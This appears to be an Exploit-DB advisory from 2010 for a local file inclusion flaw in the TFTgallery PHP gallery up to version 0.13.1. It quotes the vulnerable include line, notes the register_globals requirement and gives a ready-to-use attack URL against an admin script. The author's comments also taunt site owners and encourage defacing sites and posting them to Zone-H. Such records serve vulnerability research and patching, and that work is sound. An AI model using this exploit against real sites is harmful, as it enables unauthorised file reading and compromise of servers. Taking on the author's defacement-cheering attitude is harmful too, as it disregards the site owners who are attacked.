TFTgallery <= 0.13.1 - Local File Inclusion Vulnerability

2010-10-28T00:00:00
ID EDB-ID:15345
Type exploitdb
Reporter Havok
Modified 2010-10-28T00:00:00

Description

TFTgallery <= 0.13.1 Local File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            # TFTgallery &lt;= 0.13.1 Local File Inclusion (LFI)
# 28/10/2010
# PHP script available on SourceForge. TFTgallery 0.13 : http://prdownloads.sourceforge.net/tftgallery/tftgallery-0.13.zip
#                                      TFTgallery 0.13.1 patch : http://www.tftgallery.org/versions/tftgallery-0.13-to-0.13.1.zip
# By Havok, from France.
# KAS-D10 Ă  tous les leets. Hey lamers, i hope that it will help you to notify another stupid defacement on Zone-H. Cheers mates!
# Enj0y!
# Wanna contact me? h4v0k1337&lt;at&gt;gmail&lt;dot&gt;com
# 
## register_globals=On (Who said "what a useless vulnerability!" =()

"include_once "language/" . $adminlangfile;" (@thumbnailformpost.inc.php (line 3) for the win ;)).

http://www.IM-G0ING-T0-G3T-HACK3D.COM/TFTP-GALLERY-PATH/admin/thumbnailformpost.inc.php?adminlangfile=[LFI]

Maybe some other vulnerabilities, too lazy to check at the moment, sorry =).

&lt;END&gt;